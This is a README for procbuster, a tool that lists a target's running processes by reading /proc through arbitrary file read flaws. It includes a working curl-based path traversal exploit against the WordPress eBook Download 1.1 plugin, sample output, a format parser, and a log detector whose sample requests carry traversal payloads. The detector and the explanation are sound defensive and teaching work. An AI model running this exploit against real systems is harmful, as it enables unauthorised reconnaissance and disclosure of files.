magicrc/procbuster

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 

Repository files navigation

procbuster

procbuster is a Python-based system process enumerator that exploits arbitrary file read vulnerabilities (e.g. Local File Inclusion) to brute-force the /proc directory on a target machine. It reads each process's cmdline (and status when available) to list running processes — without shell access. The output mimics ps, making it easy to identify system activity and active services during exploitation.


⚠️ DISCLAIMER

This project is intended for educational, research, and authorized security testing purposes only.
Do not use this code on systems you do not own or have explicit permission to test.
The author is not responsible for any damage or misuse.


Usage

┌──(magicrc㉿perun)-[~/code/procbuster]
└─$ ~/code/procbuster/procbuster.py --help
usage: procbuster.py [-h] --file-read-cmd CMD [--max-pid MAX_PID] [--workers N] [--timeout S]

Lists processes by brute-forcing /proc PIDs and reading status and cmdline.

options:
  -h, --help           show this help message and exit
  --file-read-cmd CMD  Command used to read remote files. The target path is appended as the last argument. Example: ./exploit.sh
  --max-pid MAX_PID    Maximum PID to check (default: 65535)
  --workers N          Concurrent worker threads (default: 50)
  --timeout S          Per-request timeout in seconds (default: 5)

--file-read-cmd is mandatory. The command must accept a remote file path as its last argument and print the file contents to stdout. Empty output is treated as "file not found".

Before scanning, procbuster validates the command by reading /proc/self/cmdline on the target. If no output is returned the tool exits immediately with an error.


How it works

  1. Reads /etc/passwd from the target to build a UID → username map.
  2. Brute-forces PIDs from 1 to --max-pid concurrently using a thread pool.
  3. For each PID, reads /proc/<pid>/cmdline as the primary existence check.
  4. If /proc/<pid>/status is also readable, extracts the process name and UID for user resolution.
  5. Prints results as they arrive (no buffering).
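The file formats behind steps 1, 3 and 4 are the same ones a local ps-style listing is built from: /etc/passwd has the UID in its third colon-separated field, /proc/<pid>/cmdline separates arguments with NUL bytes (and is empty for kernel threads), and /proc/<pid>/status carries a Name line and a Uid line whose first value is the real UID. The parser below is an added illustration of that format handling, not procbuster's own code; every input it consumes is a constructed sample embedded inline (the PIDs, users and commands are fictitious), so it runs offline and shows how a bracketed kernel-thread name and an unresolved UID are handled.

```python
"""Parse the /etc/passwd, /proc/<pid>/cmdline and /proc/<pid>/status formats into ps-style rows.

Added illustration of the formats described in "How it works"; not procbuster's own code.
All inputs below are constructed samples, not read from a real system.
"""
from typing import Dict, Optional

# Constructed /etc/passwd excerpt (field 1 = name, field 3 = numeric UID).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:113:120:MySQL Server,,,:/nonexistent:/bin/false
"""

# Constructed /proc/<pid>/status excerpt for a fictitious PID 1234 (tab-separated values).
SAMPLE_STATUS = """Name:\tmysqld
Umask:\t0027
State:\tS (sleeping)
Tgid:\t1234
Pid:\t1234
PPid:\t1
Uid:\t113\t113\t113\t113
Gid:\t120\t120\t120\t120
"""

# /proc/<pid>/cmdline separates arguments with NUL bytes and ends with one.
SAMPLE_CMDLINE = b"/usr/sbin/mysqld\x00--basedir=/usr\x00--datadir=/var/lib/mysql\x00"

# Kernel threads have an empty cmdline; only status carries their name.
SAMPLE_KTHREAD_STATUS = "Name:\tkthreadd\nState:\tS (sleeping)\nPid:\t2\nUid:\t0\t0\t0\t0\n"
SAMPLE_KTHREAD_CMDLINE = b""


def parse_passwd(text: str) -> Dict[int, str]:
    """Map numeric UID -> username from /etc/passwd contents (UID is field 3)."""
    uid_map: Dict[int, str] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 3 or not fields[2].isdigit():
            continue  # skip blank or malformed lines
        uid_map[int(fields[2])] = fields[0]
    return uid_map


def parse_status(text: str) -> Dict[str, str]:
    """Parse the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    out: Dict[str, str] = {}
    for line in text.splitlines():
        if ":" in line:
            key, _, value = line.partition(":")
            out[key.strip()] = value.strip()
    return out


def real_uid(status: Dict[str, str]) -> Optional[int]:
    """The Uid line holds real, effective, saved and filesystem UIDs; return the real one."""
    uid_line = status.get("Uid")
    if not uid_line:
        return None
    return int(uid_line.split()[0])


def parse_cmdline(raw: bytes, status: Dict[str, str]) -> str:
    """Join NUL-separated arguments; fall back to the bracketed name ps prints for kernel threads."""
    args = [a.decode("utf-8", "replace") for a in raw.split(b"\x00") if a]
    if args:
        return " ".join(args)
    name = status.get("Name")
    return f"[{name}]" if name else ""


def process_row(pid: int, cmdline: bytes, status_text: str, uid_map: Dict[int, str]) -> Dict[str, object]:
    """Build one ps-style row: PID, resolved user (numeric UID if unknown, '?' if absent), command."""
    status = parse_status(status_text)
    uid = real_uid(status)
    user = uid_map.get(uid, str(uid) if uid is not None else "?")
    return {"pid": pid, "user": user, "cmd": parse_cmdline(cmdline, status)}


def format_row(row: Dict[str, object]) -> str:
    """Fixed-width columns matching the PID / USER / CMD layout shown in the README."""
    return f"{row['pid']:<7} {row['user']:<20} {row['cmd']}"


if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    print(format_row({"pid": "PID", "user": "USER", "cmd": "CMD"}))
    print(format_row(process_row(2, SAMPLE_KTHREAD_CMDLINE, SAMPLE_KTHREAD_STATUS, users)))
    print(format_row(process_row(1234, SAMPLE_CMDLINE, SAMPLE_STATUS, users)))
```

Two details matter for correctness: the Uid line lists four values, and only the first (the real UID) should be resolved against /etc/passwd; and an empty cmdline does not mean "no process", because kernel threads always have one, which is why the bracketed Name from status is used as the fallback.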

Example

Using the WordPress eBook Download 1.1 directory traversal vulnerability:

┌──(magicrc㉿perun)-[~/code/procbuster]
└─$ cat exploit.sh
#!/bin/bash
curl -s -o - "http://target/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../..$1" \
    | sed "s|\(../../../../../..${1}\)\+||g" \
    | sed 's#<script>window\.close()</script>$##'

┌──(magicrc㉿perun)-[~/code/procbuster]
└─$ ./procbuster.py --file-read-cmd ./exploit.sh --max-pid 20
PID     USER                 CMD
1       root                 /sbin/init auto automatic-ubiquity noprompt
2       root                 [kthreadd]
3       root                 [rcu_gp]
4       root                 [rcu_par_gp]
6       root                 [kworker/0:0H-kblockd]
7       root                 [kworker/0:1-events]
9       root                 [mm_percpu_wq]
10      root                 [ksoftirqd/0]
11      root                 [rcu_sched]
12      root                 [migration/0]
13      root                 [idle_inject/0]
14      root                 [cpuhp/0]
15      root                 [cpuhp/1]
16      root                 [idle_inject/1]
17      root                 [migration/1]
18      root                 [ksoftirqd/1]
20      root                 [kworker/1:0H-kblockd]
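From the defender's side, a sweep like the one above leaves a distinctive trace in the web server's access log: one client issuing many traversal requests whose decoded path points at /proc/<pid>/cmdline or /proc/<pid>/status for consecutive PIDs within seconds. The detector below is an added example, not part of procbuster. It runs over constructed log lines in Apache/nginx combined format; the plugin path and parameter name are taken from the exploit.sh example above, while the client addresses, timestamps and sizes are invented. It decodes URL encoding (two rounds, to catch double-encoded traversal), extracts the /proc target, and alerts when one client touches at least three distinct PIDs inside a sliding window.

```python
"""Flag /proc enumeration through a path-traversal file read in web access logs.

Added defensive example; not part of procbuster. SAMPLE_LOG is constructed: the
plugin path and parameter come from the exploit.sh example, everything else is invented.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from urllib.parse import unquote

SAMPLE_LOG = """203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../proc/self/cmdline HTTP/1.1" 200 48 "-" "curl/8.0.1"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../etc/passwd HTTP/1.1" 200 1931 "-" "curl/8.0.1"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../proc/1/cmdline HTTP/1.1" 200 45 "-" "curl/8.0.1"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../proc/2/cmdline HTTP/1.1" 200 30 "-" "curl/8.0.1"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2f3%2fstatus HTTP/1.1" 200 30 "-" "curl/8.0.1"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/wp-content/uploads/guide.pdf HTTP/1.1" 200 88210 "-" "Mozilla/5.0"
"""

# Combined log format prefix: client, identd, user, [timestamp], "METHOD PATH PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Directory traversal sequences, Unix or Windows style.
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\')
# The /proc entries a process enumerator reads.
PROC_RE = re.compile(r'(?:^|/)proc/(?P<pid>\d+|self)/(?P<file>cmdline|status|environ|maps)')


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Split one combined-format line; decode the path twice to undo double URL encoding."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": unquote(unquote(m.group("path"))),
        "status": int(m.group("status")),
    }


def classify(path: str) -> Optional[str]:
    """Return the normalised /proc entry a traversal request targets, or None if not a /proc read."""
    if not TRAVERSAL_RE.search(path):
        return None
    m = PROC_RE.search(path)
    if not m:
        return None
    return f"/proc/{m.group('pid')}/{m.group('file')}"


def find_proc_sweeps(log_text: str, window: timedelta = timedelta(seconds=60),
                     min_distinct_pids: int = 3) -> List[Dict[str, object]]:
    """Per client, slide a time window over /proc traversal hits; alert once enough distinct PIDs appear."""
    hits: Dict[str, list] = defaultdict(list)  # ip -> [(timestamp, pid), ...]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        target = classify(str(rec["path"]))
        if target is None:
            continue
        hits[str(rec["ip"])].append((rec["ts"], target.split("/")[2]))

    alerts = []
    for ip, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            # /proc/self is read once as a validation probe; count only numeric PIDs.
            pids = {pid for _, pid in events[start:end + 1] if pid != "self"}
            if len(pids) >= min_distinct_pids:
                alerts.append({"ip": ip, "first": events[start][0], "last": events[end][0],
                               "distinct_pids": len(pids)})
                break  # one alert per client is enough
    return alerts


if __name__ == "__main__":
    for alert in find_proc_sweeps(SAMPLE_LOG):
        print(f"{alert['ip']}: {alert['distinct_pids']} distinct PIDs read via traversal "
              f"between {alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}")
```

The threshold is deliberately low: legitimate traffic never references /proc/<pid>/ through a file-download parameter, so even a handful of such requests from one client is worth an alert, and the /proc/self/cmdline probe this tool sends before scanning is itself a useful early signal. Decoding the path twice matters because a single round leaves `%252e%252e%252f` looking harmless.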

About

Python-based /proc brute-forcer that enumerates running processes via arbitrary file read vulnerabilities (LFI, path traversal, XXE, etc.)
